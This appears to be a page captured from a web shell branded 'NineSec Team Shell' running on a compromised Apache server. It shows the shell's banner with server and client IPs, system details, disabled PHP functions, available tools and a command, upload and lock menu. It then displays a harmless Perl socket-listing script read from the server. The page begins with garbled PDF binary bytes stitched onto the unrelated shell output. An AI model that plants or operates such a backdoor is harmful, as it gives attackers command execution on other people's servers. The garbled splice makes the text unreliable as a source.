%PDF-1.3 %âãÏÓ 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream xœ¥\mo7þ ÿa?îâñH£ÑÌàŠyi{¹$EÚ(i?¬cÇÞÄkûürAþý‰½Žv·EÛízF¢HI|H‘Ô?¿{Ø|Z|X|÷Ýñó‡‡õÇËó³Å‡ã77Û?O¾Ýž¿__l®×››ëãßOàя77çwß¿xñêåâÅÉÓ'Ç?ªÅ°8ùôôI] µûgQ»ÔB©¦2zaà³]œlÝûÅ|üôôɇåÛ՟‹“?}òƒ£ " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress NineSec Team Shell
NineSec Team Shell
Server IP : 192.168.60.199  /  Your IP : 192.168.60.1
Web Server : Apache
System : Linux PROD-conference 6.8.12-17-pve #1 SMP PREEMPT_DYNAMIC PMX 6.8.12-17 (2025-11-21T11:16Z) x86_64
User : www-data ( 33)
PHP Version : 5.6.40-0+deb8u12
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/../run/../sbin/../../../usr/bin/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : //home/../run/../sbin/../../../usr/bin/socklist
#!/usr/bin/perl

# socklist
# Simple and effective substitute for "lsof" for Linux with a proc filesystem.
# Standard permissions on the proc filesystem make this program only
# useful when run as root.

# Larry Doolittle <ldoolitt@jlab.org>
# September 1997

# example output (with # added given the context of a perl program):
#
# type  port      inode     uid    pid   fd  name
# tcp   1023     394218     425  23333    3  ssh
# tcp   1022     394166     425  23312    3  ssh
# tcp   6000     387833     313   3942    0  X
# tcp   2049      81359       0  13296    4  rpc.nfsd
# tcp    745      81322       0  13287    4  rpc.mountd
# tcp    111      81282       0  13276    4  portmap
# tcp     22      26710       0   7372    3  sshd
# tcp     25      25902       0    156   18  inetd
# tcp     80      20151       0   2827    4  boa-0.92
# tcp     23       2003       0    156    5  inetd
# udp    620     855681       0      0    0  
# udp    655     394445       0      0    0  
# udp   2049      81356       0  13296    3  rpc.nfsd
# udp    743      81319       0  13287    3  rpc.mountd
# udp    111      81281       0  13276    3  portmap
# udp    707       2776       0      0    0  
# udp    514       1861       0    124    1  syslogd
# raw      1          0       0      0    0  
#
# It appears that each NFS mount generates an open udp port, which
# is not associated with any process.  This is the origin of those
# mysterious ports 620, 655, and 707 above.  I still don't understand
# the meaning of raw port 1.

# part 1: scan through the /proc filesystem building up
# a list of what processes own what network "inodes".
# result is associative array %sock_proc.

opendir (PROC, "/proc") || die "proc";
for $f (readdir(PROC)) {
    next if (! ($f=~/[0-9]+/) );
    if (! opendir (PORTS, "/proc/$f/fd")) {
        # print "failed opendir on process $f fds\n";
        closedir PORTS;
        next;
    }
    for $g (readdir(PORTS)) {
        next if (! ($g=~/[0-9]+/) );
        $r=readlink("/proc/$f/fd/$g");

# 2.0.33: [dev]:ino 
#	($dev,$ino)=($r=~/^\[([0-9a-fA-F]*)\]:([0-9]*)$/);
# 2.0.78: socket:[ino]
#	($dev,$ino)=($r=~/^(socket):\[([0-9]*)\]$/);
# -svm-
	($dev,$ino)=($r=~/^(socket|\[[0-9a-fA-F]*\]):\[?([0-9]*)\]?$/);

        # print "$f $g $r DEV=$dev INO=$ino\n";
        if ($dev == "[0000]" || $dev == "socket") {$sock_proc{$ino}=$f.":".$g;}
    }
    closedir PORTS;
}
closedir PROC;

# exit;

# for $a (keys(%sock_proc)) {print "$a $sock_proc{$a}\n";}

# part 2: read /proc/net/tcp, /proc/net/udp, and /proc/net/raw,
# printing the answers as we go.

print "type  port      inode     uid    pid   fd  name\n";
sub scheck {
    open(FILE,"/proc/net/".$_[0]) || die;
    while (<FILE>) {
        @F=split();
        next if ($F[9]=~/uid/);
        @A=split(":",$F[1]);
        $a=hex($A[1]);
        ($pid,$fd)=($sock_proc{$F[9]}=~m.([0-9]*):([0-9]*).);
        $cmd = "";
        if ($pid && open (CMD,"/proc/$pid/status")) {
           $l = <CMD>;
           ($cmd) = ( $l=~/Name:\s*(\S+)/ );
           close(CMD);
	}
        printf "%s %6d %10d  %6d %6d %4d  %s\n",
            $_[0], $a ,$F[9], $F[7], $pid, $fd, $cmd;
    }
    close(FILE);
}

scheck("tcp");
scheck("udp");
scheck("raw");

NineSec Team - 2022